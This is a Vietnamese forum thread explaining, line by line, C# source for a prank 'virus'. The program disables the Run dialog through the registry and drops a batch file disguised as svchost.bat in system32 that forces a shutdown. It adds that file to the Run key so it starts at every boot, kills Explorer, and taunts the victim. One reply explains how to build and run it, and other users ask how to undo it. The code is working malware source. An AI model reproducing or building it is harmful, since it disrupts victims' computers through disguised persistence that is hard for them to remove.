anh có thể giải thích từng dòng code cho em được không anh.
Printable View
anh có thể giải thích từng dòng code cho em được không anh.
Đây là bước load module hệ thống để sử dụng. Code này là C# nên cần load .net.Trích:
using System;using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.Win32;
using System.IO;
using System.Diagnostics;
Nhìn vào using System.Linq; thì biết cậu này code bằng visual 2008 hoặc 2010
Ví dụ:
Bên dưới có dòng
System.Diagnostics.Process.Start("explorer.exe");
Nếu phía trên không có using System.Diagnostics; thì phải gõ nguyên dòng System.Diagnostics.Process.Start("explorer.exe"); để chạy Process.Start(). Tuy nhiên ở trên đã có using System.Diagnostics; nên thực tế chỉ cần gõ Process.Start("explorer.exe"); là chạy được rồi.
Cái này là tạo key trong registryTrích:
Registry.SetValue(@"HKEY_CURRENT_USER\Software\Mic rosoft\Windows\CurrentVersion\policies\Explorer", "NoRun", 1, Microsoft.Win32.RegistryValueKind.DWord);
tại khóa HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\policies\Explorer, sẽ tạo một key mới với tên là NoRun có giá trị 1, kiểu dữ liệu là DWord
Mấy dòng dưới tương tự.
StreamWriter sw = new StreamWriter("C:\\windows\\system32\\svchost.bat") ;Trích:
StreamWriter sw = new StreamWriter("C:\\windows\\system32\\svchost.bat") ;
string s = "shutdown/s /f /t 0300 /c " + (char)34 + "Tu dong tat may sau 300 giay" + (char)34;
sw.Write(s.ToString());
sw.Close();
sw.Write(s.ToString());
sw.Close();
Tạo một file svchost.bat trong thư mục system32
Bên trong file svchost.bat có nội dung
shutdown/s /f /t 0300 /c "Tu dong tat may sau 300 giay"
Cái char(34) là để ghi dấu " vào thôi.
XongTrích:
foreach (Process proc in Process.GetProcesses()) =>tìm trong process
{
if (proc.ProcessName == "explorer") proc.Kill(); => có cái nào tên là "explorer" thì tắt nó đi
}
System.Diagnostics.Process.Start("explorer.exe"); => khởi động lại explorer
System.Diagnostics.Process.Start("shutdown", "/s /f /t 0300 /c " + (char)34 + "Tu dong tat may sau 300 giay" + (char)34); => Shutdown máy
Registry.SetValue("HKEY_CURRENT_USER\\Software\\Mi crosoft\\Windows\\CurrentVersion\\Run", "svchost",
"C:\\windows\\system32\\svchost.bat", Microsoft.Win32.RegistryValueKind.String);=>ghi file svchost cho nó tự động chạy mỗi khi khởi động máy
Console.Write("Chuc Mung Ban Dinh Con Virus Con Gio "); => Xuất ra dòng chữ Chuc Mung Ban Dinh Con Virus Con Gio
Console.ReadLine();
}
}
anh ơi, cách sử dụng ra sao? nếu đã lỡ chạy nó ra file exe trong máy rồi, vậy làm sao khắc phục đc.
Muốn chạy thì phải build nó ra file exe rồi kich lên chạy thôi.
Muốn gỡ nó thì bạn làm các bước trên, nhưng làm ngược lại là được
Cho mình hỏi là làm sao để khắc phục nếu đã chạy !!